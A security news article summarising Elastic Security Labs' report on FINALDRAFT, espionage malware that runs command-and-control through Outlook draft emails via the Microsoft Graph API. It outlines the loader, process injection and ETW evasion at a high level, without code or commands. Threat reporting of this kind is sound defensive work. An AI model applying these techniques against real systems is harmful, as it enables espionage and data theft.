Elastic Security Labs discovered a new form of malware during a recent investigation (REF7707) that uses Microsoft’s Graph API for data exfiltration and process injection.
The malware, called FINALDRAFT, appears to be part of an espionage campaign linked to China. It contains a customized loader and backdoor with extensive functionality, including command-and-control (C2) communication via Outlook.
Threat researchers have determined that this malware campaign targeted the foreign ministry of an undisclosed South American country. A telecommunications company and a university in Southeast Asia were also affected. The attacks, discovered in November 2024, are attributed to the REF7707 threat group.
Although the malware is highly sophisticated, the attackers showed inconsistencies in their evasion techniques and campaign management. This possibly indicates a less experienced but well-organized group of attackers.
Attack techniques and infection process
The initial attack point is still unknown, but researchers determined that Microsoft’s certutil application is used to download malicious files. These commands are executed via Windows Remote Management’s Remote Shell plugin (WinrsHost.exe). This indicates that the attackers already had valid network credentials and were able to move laterally within the infrastructure.
A key component of the attack is the deployment of PATHLOADER, an initial malware that executes encrypted shellcode. The final payload, FINALDRAFT, is then injected into the memory of a newly started mspaint.exe process, complicating detection. This is according to an analysis by The Hacker News.
Misuse of Microsoft Graph API.
FINALDRAFT is written in C++ and functions as a full-fledged external management tool. The malware reads commands from the drafts folder of a compromised email account and writes the execution results into new draft emails. This communication mechanism makes detection and blocking by traditional security solutions difficult.
With 37 built-in command handlers, FINALDRAFT offers various capabilities, including process injection, file manipulation and network proxy functionalities. Moreover, the malware can start new processes with stolen NTLM hashes and execute PowerShell commands without calling powershell.exe directly, bypassing detection via Event Tracing for Windows (ETW). Various API manipulation techniques are used for this purpose, including the use of PowerPick from the Empire post-exploitation toolkit.
Linux variant
In addition to the Windows variant, a Linux version of FINALDRAFT has also been discovered. Uploaded ELF binaries on VirusTotal from Brazil and the United States suggest that this variant has similar C2 functionalities. In addition, this version contains a mechanism to remove itself from the system, indicating an advanced persistence strategy.
The complexity and long development path of FINALDRAFT suggest that these tools have likely been in use for some time. Elastic Security Labs concludes that this malware campaign represents a well-organized and long-term espionage operation.
Also read: Outdated WordPress versions and plugins abused for large-scale malware attack